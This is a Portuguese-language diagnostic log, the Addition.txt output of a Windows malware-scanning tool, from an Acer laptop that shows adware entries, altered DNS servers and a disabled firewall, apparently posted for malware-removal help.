2015-02-25 19:29 - 2013-12-09 21:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2016-02-11 11:33 - 2015-01-13 02:31 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll
2010-01-30 03:41 - 2010-01-30 03:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2016-01-19 15:06 - 2016-01-19 15:06 - 00194048 _____ () C:\Program Files (x86)\Acer\Acer Portal\curllib.dll
2016-01-19 15:06 - 2016-01-19 15:06 - 00110592 _____ () C:\Program Files (x86)\Acer\Acer Portal\OpenLDAP.dll
2015-11-16 19:55 - 2015-11-16 19:55 - 00202456 _____ () C:\Program Files (x86)\Acer\abPhoto\curllib.dll
2015-11-16 19:56 - 2015-11-16 19:56 - 00119000 _____ () C:\Program Files (x86)\Acer\abPhoto\OpenLDAP.dll
2015-11-16 19:56 - 2015-11-16 19:56 - 00654000 _____ () C:\Program Files (x86)\Acer\abPhoto\sqlite3.dll
2015-11-16 19:56 - 2015-11-16 19:56 - 00641240 _____ () C:\Program Files (x86)\Acer\abPhoto\tag.dll
2016-02-04 11:13 - 2016-02-04 11:13 - 00015064 _____ () C:\Windows\assembly\GAC_MSIL\MyService\1.0.0.1__2dfa3f50f0bed57d\MyService.dll
2016-01-14 17:12 - 2016-01-14 17:12 - 00013016 _____ () C:\Program Files (x86)\Acer\AOP Framework\ServiceInterface.dll
2016-01-14 17:11 - 2016-01-14 17:11 - 00277856 _____ () C:\Program Files (x86)\Acer\AOP Framework\libcurl.dll
2016-02-10 22:08 - 2016-02-09 09:58 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libglesv2.dll
2016-02-10 22:08 - 2016-02-09 09:58 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt
AlternateDataStreams: C:\Windows\System32:C50A5169_Cef.gbp
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
==================== EXE Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
IE trusted site: HKU\.DEFAULT\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-764792763-2688571116-1659716825-1007\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-764792763-2688571116-1659716825-1007\...\caixa.gov.br -> imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-764792763-2688571116-1659716825-1010\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
==================== Hosts Conteúdo: ==========================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-14 00:34 - 2016-01-30 15:46 - 00000967 ____N C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-764792763-2688571116-1659716825-1007\Control Panel\Desktop\\Wallpaper -> C:\Users\josejoo\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-764792763-2688571116-1659716825-1010\Control Panel\Desktop\\Wallpaper -> C:\Users\joao.josejoao-PC.000\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 82.163.143.189 - 82.163.142.189
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Firewall do Windows está desabilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
(Atualmente não há nenhuma correção automática para esta seção.)
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{2F0C5BB3-5BF9-48CD-ADC0-E1D11880A780}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{1542AB6D-DB6A-4335-855F-13A5FCA43733}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{2F31A6BA-D110-47CD-B6F5-177AB9849494}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{BB76A5ED-5E0D-4B99-AC4A-1DB8675A7436}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{16A0E38E-B5F7-493E-8B26-EC813FA68B52}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{2B2AC2AA-04EC-4A21-9611-89F06B76CFBD}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{E1DD8812-C033-442E-B657-F43388539085}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{D570674A-67ED-4F40-ABAB-DF5F7ECD5B0A}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{E5CFDD74-FA6B-4C60-9A12-7911BB8C70AC}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{3A15B57D-007A-4B57-8807-1A18E588C9A4}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{9AA2A601-3E4E-4CA2-8DE1-0A55A6F34BAE}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{0E110D24-CD85-49CA-BEE7-56ABFAA33432}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{ADFE08B6-F637-4FF4-9D56-1F3C142699B0}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{92E6CF31-9195-427A-B896-7FE3C59E0A9D}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{05050C04-DFFD-4F18-91EB-75DD13591E80}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{3BDBE8BC-1F42-4789-BDDE-DA487F8A5383}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [TCP Query User{934E79DB-0FCD-46CC-92D7-8AF9A9558973}C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe
FirewallRules: [UDP Query User{194F9058-7ADB-4F5A-A19F-74F582BF1E83}C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_60\bin\javaw.exe
FirewallRules: [{8EBBE737-3118-4453-B83D-88AA892641AF}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{9A9568DB-5DCC-4E09-B0CE-7AF5CB49FE1D}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{9A64E5F4-EAF6-4AE7-A029-4C701FF6C7C9}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{4F0B63D4-7C65-4042-A326-D9DA2BE8F8C4}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{47F7EAE8-B9F2-45AC-882E-F8B2CC9837EC}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{2134188F-B0DB-44CF-878D-BD2DEB8331A7}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe
FirewallRules: [{45E65790-1E8A-4637-9C4E-6862BC46A4E5}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{7CE4796C-AF0E-4044-904B-6B6E10F533EF}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe
FirewallRules: [{C27B8F18-59BA-4C1D-B213-C57B1376116A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{49B73378-69EB-4CF5-A345-2910A4577FA2}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
FirewallRules: [{0F25C8F0-99AB-4EB9-9B82-9BCFFA7C882F}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
==================== Pontos de Restauração =========================
04-02-2016 17:28:19 Ponto de Verificação Agendado
05-02-2016 08:50:38 Removed Adobe Flash Player 14 ActiveX.
11-02-2016 08:20:37 Windows Update
12-02-2016 10:15:00 Windows Update
12-02-2016 15:02:19 Windows Update
==================== Dispositivos Apresentando Falhas No Gerenciador =============
Name: Bluetooth USB Module
Description: Bluetooth USB Module
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Qualcomm Atheros Communications
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name: SBMNTR
Description: SBMNTR
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: sbmntr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
Name: SPDRIVER_1.42.1.10638
Description: SPDRIVER_1.42.1.10638
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: SPDRIVER_1.42.1.10638
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (02/18/2016 09:40:00 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (02/18/2016 09:39:42 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: svchost.exe_SENS, versão: 6.1.7600.16385, carimbo de hora: 0x4a5bc3c1
Nome do módulo de falhas: iSafeSrvMon64.dll, versão: 6.7.30.28593, carimbo de hora: 0x55b5abeb
Código de exceção: 0xc0000417
Deslocamento com falha: 0x0000000000005cc1
Identificação do processo com falha: 0x48c
Hora de início do aplicativo com falha: 0xsvchost.exe_SENS0
Caminho do aplicativo com falha: svchost.exe_SENS1
FCaminho do módulo de falhas: svchost.exe_SENS2
Identificação do Relatório: svchost.exe_SENS3
Error: (02/18/2016 09:14:46 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Nome do módulo de falhas: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003ef0d
Identificação do processo com falha: 0x1120
Hora de início do aplicativo com falha: 0xHomePage.exe0
Caminho do aplicativo com falha: HomePage.exe1
FCaminho do módulo de falhas: HomePage.exe2
Identificação do Relatório: HomePage.exe3
Error: (02/18/2016 09:10:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: mediadownloadersetup.exe, versão: 0.0.0.0, carimbo de hora: 0x2a425e19
Nome do módulo de falhas: ntdll.dll, versão: 6.1.7601.23338, carimbo de hora: 0x56a1c6e6
Código de exceção: 0xc0000005
Deslocamento com falha: 0x0004def6
Identificação do processo com falha: 0xe58
Hora de início do aplicativo com falha: 0xmediadownloadersetup.exe0
Caminho do aplicativo com falha: mediadownloadersetup.exe1
FCaminho do módulo de falhas: mediadownloadersetup.exe2
Identificação do Relatório: mediadownloadersetup.exe3
Error: (02/18/2016 09:06:28 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: MustangSer258.exe, versão: 1.0.0.6, carimbo de hora: 0x567001d1
Nome do módulo de falhas: MustangSer258.exe, versão: 1.0.0.6, carimbo de hora: 0x567001d1
Código de exceção: 0x40000015
Deslocamento com falha: 0x00012d34
Identificação do processo com falha: 0x9fc
Hora de início do aplicativo com falha: 0xMustangSer258.exe0
Caminho do aplicativo com falha: MustangSer258.exe1
FCaminho do módulo de falhas: MustangSer258.exe2
Identificação do Relatório: MustangSer258.exe3
Error: (02/18/2016 09:05:58 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (02/18/2016 08:32:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804
Nome do módulo de falhas: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003dd0a
Identificação do processo com falha: 0x1aec
Hora de início do aplicativo com falha: 0xLightGate.exe0
Caminho do aplicativo com falha: LightGate.exe1
FCaminho do módulo de falhas: LightGate.exe2
Identificação do Relatório: LightGate.exe3
Error: (02/18/2016 08:32:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Nome do módulo de falhas: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003ef0d
Identificação do processo com falha: 0x1b08
Hora de início do aplicativo com falha: 0xHomePage.exe0
Caminho do aplicativo com falha: HomePage.exe1
FCaminho do módulo de falhas: HomePage.exe2
Identificação do Relatório: HomePage.exe3
Error: (02/18/2016 08:31:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Nome do módulo de falhas: HomePage.exe, versão: 0.0.0.0, carimbo de hora: 0x56557477
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003ef0d
Identificação do processo com falha: 0xcec
Hora de início do aplicativo com falha: 0xHomePage.exe0
Caminho do aplicativo com falha: HomePage.exe1
FCaminho do módulo de falhas: HomePage.exe2
Identificação do Relatório: HomePage.exe3
Error: (02/18/2016 08:31:38 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804
Nome do módulo de falhas: LightGate.exe, versão: 0.0.0.0, carimbo de hora: 0x56613804
Código de exceção: 0x40000015
Deslocamento com falha: 0x0003dd0a
Identificação do processo com falha: 0xda4
Hora de início do aplicativo com falha: 0xLightGate.exe0
Caminho do aplicativo com falha: LightGate.exe1
FCaminho do módulo de falhas: LightGate.exe2
Identificação do Relatório: LightGate.exe3
Erros de Sistema:
=============
Error: (02/18/2016 09:47:20 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: Específico do aplicativoLocalIniciar{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)
Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Testador de instrumentação de gerenciam. do Windows, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Agendador de Classes de Multimídia, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Módulos de Criação de Chaves IKE e AuthIP do IPSec, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:41:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Pesquisador de Computadores, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:40:58 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: O Gerenciador de controle de serviços tentou executar uma ação corretiva (Reiniciar o serviço) após a finalização inesperada do serviço Server, mas essa ação falhou com o seguinte erro:
%%1056
Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Windows Update foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço.
Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Testador de instrumentação de gerenciam. do Windows foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 120000 milissegundos: Reiniciar o serviço.
Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Temas foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço.
Error: (02/18/2016 09:39:58 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Detecção do hardware do shell foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço.
CodeIntegrity:
===================================
Date: 2016-01-28 14:38:49.574
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM) i3-4005U CPU @ 1.70GHz
Percentagem de memória em uso: 74%
RAM física total: 4023.36 MB
RAM física disponível: 1034.13 MB
Virtual Total: 8044.91 MB
Virtual disponível: 4082.44 MB
==================== Drives ================================
Drive c: (Acer) (Fixed) (Total:448.39 GB) (Free:365.47 GB) NTFS
Drive e: (JOSÉ JOÃO) (Removable) (Total:7.25 GB) (Free:4.63 GB) FAT32
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 29F6CCD9)
Partition 1: (Not Active) - (Size=17.3 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=448.4 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 7.3 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=7.3 GB) - (Type=0B)
==================== Fim de Addition.txt ============================